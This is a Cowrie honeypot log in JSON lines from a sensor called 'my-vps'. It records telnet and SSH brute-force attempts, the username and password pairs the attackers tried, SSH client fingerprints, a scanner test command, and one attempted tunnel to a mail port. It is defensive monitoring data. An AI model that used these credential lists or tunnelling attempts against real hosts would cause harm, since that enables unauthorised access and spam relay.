{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":35718,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec6b61d9d444","protocol":"telnet","message":"New connection: 170.64.140.97:35718 (1.2.3.4:23) [session: ec6b61d9d444]","sensor":"my-vps","timestamp":"2025-08-26T17:05:12.915757Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T17:05:14.929129Z","src_ip":"170.64.140.97","session":"ec6b61d9d444"}
{"eventid":"cowrie.session.closed","duration":4.327309608459473,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:17.242988Z","src_ip":"170.64.140.97","session":"ec6b61d9d444"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":57570,"dst_ip":"1.2.3.4","dst_port":23,"session":"e49227411aba","protocol":"telnet","message":"New connection: 170.64.140.97:57570 (1.2.3.4:23) [session: e49227411aba]","sensor":"my-vps","timestamp":"2025-08-26T17:05:17.522530Z"}
{"eventid":"cowrie.session.closed","duration":1.462031364440918,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:18.984492Z","src_ip":"170.64.140.97","session":"e49227411aba"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":57578,"dst_ip":"1.2.3.4","dst_port":23,"session":"8370fa82a5a2","protocol":"telnet","message":"New connection: 170.64.140.97:57578 (1.2.3.4:23) [session: 8370fa82a5a2]","sensor":"my-vps","timestamp":"2025-08-26T17:05:19.260954Z"}
{"eventid":"cowrie.session.closed","duration":4.2312963008880615,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:23.492182Z","src_ip":"170.64.140.97","session":"8370fa82a5a2"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":57592,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a57c7ca17c0","protocol":"telnet","message":"New connection: 170.64.140.97:57592 (1.2.3.4:23) [session: 7a57c7ca17c0]","sensor":"my-vps","timestamp":"2025-08-26T17:05:23.771069Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T17:05:24.432485Z","src_ip":"170.64.140.97","session":"7a57c7ca17c0"}
{"eventid":"cowrie.session.closed","duration":2.795861005783081,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:26.566838Z","src_ip":"170.64.140.97","session":"7a57c7ca17c0"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":36082,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e51f82d5b80","protocol":"telnet","message":"New connection: 170.64.140.97:36082 (1.2.3.4:23) [session: 7e51f82d5b80]","sensor":"my-vps","timestamp":"2025-08-26T17:05:26.841804Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T17:05:27.463485Z","src_ip":"170.64.140.97","session":"7e51f82d5b80"}
{"eventid":"cowrie.session.closed","duration":2.770703077316284,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:29.612407Z","src_ip":"170.64.140.97","session":"7e51f82d5b80"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":36096,"dst_ip":"1.2.3.4","dst_port":23,"session":"635599e383f3","protocol":"telnet","message":"New connection: 170.64.140.97:36096 (1.2.3.4:23) [session: 635599e383f3]","sensor":"my-vps","timestamp":"2025-08-26T17:05:29.887043Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T17:05:30.535342Z","src_ip":"170.64.140.97","session":"635599e383f3"}
{"eventid":"cowrie.session.closed","duration":2.81386399269104,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:32.700843Z","src_ip":"170.64.140.97","session":"635599e383f3"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":36110,"dst_ip":"1.2.3.4","dst_port":23,"session":"aae86bc2cdb4","protocol":"telnet","message":"New connection: 170.64.140.97:36110 (1.2.3.4:23) [session: aae86bc2cdb4]","sensor":"my-vps","timestamp":"2025-08-26T17:05:32.974698Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T17:05:33.581614Z","src_ip":"170.64.140.97","session":"aae86bc2cdb4"}
{"eventid":"cowrie.session.closed","duration":2.798145055770874,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:35.772734Z","src_ip":"170.64.140.97","session":"aae86bc2cdb4"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.140.97","src_port":54612,"dst_ip":"1.2.3.4","dst_port":23,"session":"d798dadc0c58","protocol":"telnet","message":"New connection: 170.64.140.97:54612 (1.2.3.4:23) [session: d798dadc0c58]","sensor":"my-vps","timestamp":"2025-08-26T17:05:36.047737Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:05:36.685901Z","src_ip":"170.64.140.97","session":"d798dadc0c58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T17:05:36.713839Z","src_ip":"170.64.140.97","session":"d798dadc0c58"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T17:05:37.019167Z","src_ip":"170.64.140.97","session":"d798dadc0c58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:39.320458Z","src_ip":"170.64.140.97","session":"d798dadc0c58"}
{"eventid":"cowrie.session.closed","duration":3.279031753540039,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:05:39.325811Z","src_ip":"170.64.140.97","session":"d798dadc0c58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42256,"dst_ip":"1.2.3.4","dst_port":22,"session":"00ed1363fdac","protocol":"ssh","message":"New connection: 212.227.235.229:42256 (1.2.3.4:22) [session: 00ed1363fdac]","sensor":"my-vps","timestamp":"2025-08-26T17:06:07.763449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:06:08.786128Z","src_ip":"212.227.235.229","session":"00ed1363fdac"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:06:08.786954Z","src_ip":"212.227.235.229","session":"00ed1363fdac"}
{"eventid":"cowrie.login.success","username":"root","password":"Neelesh@123","message":"login attempt [root/Neelesh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:06:12.917723Z","src_ip":"212.227.235.229","session":"00ed1363fdac"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:06:13.497331Z","src_ip":"212.227.235.229","session":"00ed1363fdac"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":16176,"dst_ip":"1.2.3.4","dst_port":22,"session":"95f2189966a2","protocol":"ssh","message":"New connection: 154.221.19.37:16176 (1.2.3.4:22) [session: 95f2189966a2]","sensor":"my-vps","timestamp":"2025-08-26T17:06:13.839993Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:06:13.841663Z","src_ip":"154.221.19.37","session":"95f2189966a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37130,"dst_ip":"1.2.3.4","dst_port":22,"session":"79ba9ad3e488","protocol":"ssh","message":"New connection: 212.227.235.229:37130 (1.2.3.4:22) [session: 79ba9ad3e488]","sensor":"my-vps","timestamp":"2025-08-26T17:06:43.014514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:06:44.206114Z","src_ip":"212.227.235.229","session":"79ba9ad3e488"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:06:44.206846Z","src_ip":"212.227.235.229","session":"79ba9ad3e488"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":15904,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d4c9751df63","protocol":"ssh","message":"New connection: 154.221.19.37:15904 (1.2.3.4:22) [session: 2d4c9751df63]","sensor":"my-vps","timestamp":"2025-08-26T17:06:48.688069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:06:48.689018Z","src_ip":"154.221.19.37","session":"2d4c9751df63"}
{"eventid":"cowrie.login.success","username":"root","password":"06110611","message":"login attempt [root/06110611] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:06:48.786415Z","src_ip":"212.227.235.229","session":"79ba9ad3e488"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:06:49.399705Z","src_ip":"212.227.235.229","session":"79ba9ad3e488"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":44016,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca77a7d3ecc6","protocol":"ssh","message":"New connection: 154.221.19.37:44016 (1.2.3.4:22) [session: ca77a7d3ecc6]","sensor":"my-vps","timestamp":"2025-08-26T17:07:05.578529Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:07:05.579248Z","src_ip":"154.221.19.37","session":"ca77a7d3ecc6"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":15636,"dst_ip":"1.2.3.4","dst_port":22,"session":"2abd0d4959bc","protocol":"ssh","message":"New connection: 154.221.19.37:15636 (1.2.3.4:22) [session: 2abd0d4959bc]","sensor":"my-vps","timestamp":"2025-08-26T17:07:23.832876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:07:23.833827Z","src_ip":"154.221.19.37","session":"2abd0d4959bc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:07:26.804145Z","src_ip":"154.221.19.37","session":"2abd0d4959bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34515,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1326b9f4a35","protocol":"ssh","message":"New connection: 212.227.235.229:34515 (1.2.3.4:22) [session: b1326b9f4a35]","sensor":"my-vps","timestamp":"2025-08-26T17:07:43.117818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T17:07:43.118602Z","src_ip":"212.227.235.229","session":"b1326b9f4a35"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T17:07:43.247688Z","src_ip":"212.227.235.229","session":"b1326b9f4a35"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@123","message":"login attempt [root/admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T17:07:43.848137Z","src_ip":"212.227.235.229","session":"b1326b9f4a35"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T17:07:43.978270Z","session":"b1326b9f4a35"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T17:07:44.107796Z","src_ip":"212.227.235.229","session":"b1326b9f4a35"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:07:44.248980Z","src_ip":"212.227.235.229","session":"b1326b9f4a35"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":43748,"dst_ip":"1.2.3.4","dst_port":22,"session":"56f39af3fa8b","protocol":"ssh","message":"New connection: 154.221.19.37:43748 (1.2.3.4:22) [session: 56f39af3fa8b]","sensor":"my-vps","timestamp":"2025-08-26T17:07:47.391620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:07:47.392713Z","src_ip":"154.221.19.37","session":"56f39af3fa8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:07:48.314785Z","src_ip":"154.221.19.37","session":"56f39af3fa8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56986,"dst_ip":"1.2.3.4","dst_port":22,"session":"955cda595d17","protocol":"ssh","message":"New connection: 212.227.125.160:56986 (1.2.3.4:22) [session: 955cda595d17]","sensor":"my-vps","timestamp":"2025-08-26T17:07:52.210935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:07:52.211886Z","src_ip":"212.227.125.160","session":"955cda595d17"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T17:07:52.485928Z","src_ip":"212.227.125.160","session":"955cda595d17"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":15362,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a682182611a","protocol":"ssh","message":"New connection: 154.221.19.37:15362 (1.2.3.4:22) [session: 9a682182611a]","sensor":"my-vps","timestamp":"2025-08-26T17:08:01.447246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:08:01.462052Z","src_ip":"154.221.19.37","session":"9a682182611a"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:08:02.211390Z","src_ip":"212.227.125.160","session":"955cda595d17"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:08:13.848173Z","src_ip":"154.221.19.37","session":"95f2189966a2"}
{"eventid":"cowrie.session.connect","src_ip":"154.221.19.37","src_port":15094,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3b88276e4b7","protocol":"ssh","message":"New connection: 154.221.19.37:15094 (1.2.3.4:22) [session: f3b88276e4b7]","sensor":"my-vps","timestamp":"2025-08-26T17:08:38.980049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T17:08:38.980735Z","src_ip":"154.221.19.37","session":"f3b88276e4b7"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:08:48.695669Z","src_ip":"154.221.19.37","session":"2d4c9751df63"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T17:08:50.216201Z","src_ip":"154.221.19.37","session":"f3b88276e4b7"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T17:09:05.591223Z","src_ip":"154.221.19.37","session":"ca77a7d3ecc6"}
